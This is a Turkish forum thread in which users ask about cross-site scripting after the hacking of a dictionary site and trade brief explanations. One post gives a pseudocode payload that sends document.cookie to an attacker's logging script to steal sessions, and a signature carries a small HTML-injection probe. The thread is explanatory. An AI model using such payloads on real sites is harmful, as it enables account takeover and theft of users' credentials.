Cross Site Scripting...

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Fugitive
    Fugitive's avatar
    Kayıt Tarihi: 18/Mayıs/2003
    Erkek
    Ekşi sözlüğün hacklenmesinde kullanılan Cross Site Scripting nedir ne değildir bilgilendirirseniz sevinirim...

    You think the game is over ? It has just begun ;)
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    MartyN
    MartyN's avatar
    Kayıt Tarihi: 21/Aralık/2002
    Erkek

    kısaltımı xss ama cross site scripting css ile karistirilmamasi icin xss kisaltmasini almistir.
    url'deki parametreleri programlamanin aciklarini kullanarak elde etme metodudur.
    yazılan cesitli makaleler var nette onlari okuyun derim.


    ayrica
    http://sozluk.sourtimes.org/show.asp?t=cross+site+scripting
    ornegin show.asp* verilen parametrelerden bi tanesini ["uu" diyelim] sayfanin icine basligin yanina koysaydi, ben (pseudocode yazicam ama) show.asp?t=hede&uu=page.go("http://sitem/cookiekaydet.php?data="+document.cookie) yazip sifreyi alabilirdim. (url oyle verilince basligin hemen yanina page.go(...) yaziliyo, bunu goren browser execute ediyo, edince de sozluk username ve sifrenizin bulundugu cookie'yi url'ye ekliyo. cookiekaydet.php de url'den eklenen kukiyi alip benim diske kaydediyo mesela, ben de sizin cookie'yi kullanarak adiniza girebiliyorum.)


    222 gün siteye giriş yapmayı unutan emekli admin.
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    doguhan
    doguhan's avatar
    Hıyarlık Madalyası
    Kayıt Tarihi: 27/Kasım/2003
    Erkek
    Removed...

    hikaye
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    XhanDros
    XhanDros's avatar
    Kayıt Tarihi: 17/Temmuz/2005
    Erkek

    XSS konusunda birkac makale yazmıştım , onları netten arayıp bulabilirsiniz.


    @doguhan ,


    eksisozluk üzerinde XSS'ye açık yer bulamadığın sürece istediğin kadar yedirebileğin eleman olsun farketmez.Cookie çalman için o site üstünden loglaman gerekir.


    "><i>">sdad
  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    MafiABoY
    MafiABoY's avatar
    Kayıt Tarihi: 17/Temmuz/2005
    Erkek
    Cross site scriptingi buraya basitçe anlatabilirmisiniz temelini kavramak için

    Habala hübele hüp DELİLER BİRLİĞİ
  6. KısayolKısayol reportŞikayet pmÖzel Mesaj
    ir2
    ir2's avatar
    Bilgi/Destek Madalyası Developer Madalyası
    Kayıt Tarihi: 10/Mayıs/2003
    Erkek
    ferruh.mavituna.com da çok güzel XSS örnekleri war mantığı kolayca kavrarsınız
  7. KısayolKısayol reportŞikayet pmÖzel Mesaj
    doguhan
    doguhan's avatar
    Hıyarlık Madalyası
    Kayıt Tarihi: 27/Kasım/2003
    Erkek

    Removed...


    hikaye
  8. KısayolKısayol reportŞikayet pmÖzel Mesaj
    XhanDros
    XhanDros's avatar
    Kayıt Tarihi: 17/Temmuz/2005
    Erkek

    [alinti]css diyordun galiba[/alinti]


    cross site scripting'in kısaltılmış hali xss'dir.Çünkü css (Cascading Style Sheets) )olarak kullanılır.Karışmaması için xss olarak geçer.


    "><i>">sdad
  9. KısayolKısayol reportŞikayet pmÖzel Mesaj
    doguhan
    doguhan's avatar
    Hıyarlık Madalyası
    Kayıt Tarihi: 27/Kasım/2003
    Erkek

    Removed...


    hikaye
  10. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Fistandantilus
    Fistandantilus's avatar
    Kayıt Tarihi: 28/Eylül/2004
    Erkek
    Biri XSS ile nasıl hacklenildiğini tam kodlarıyla ve örnek üstünde döküman haline getirebilir mi?

    Fakat söyleyin kardeşlerim; insanlığın bir ereği eksikse, eksik değil midir- bizzat kendisi de?
  11. KısayolKısayol reportŞikayet pmÖzel Mesaj
    doguhan
    doguhan's avatar
    Hıyarlık Madalyası
    Kayıt Tarihi: 27/Kasım/2003
    Erkek

    Removed...


    hikaye
Toplam Hit: 2432 Toplam Mesaj: 13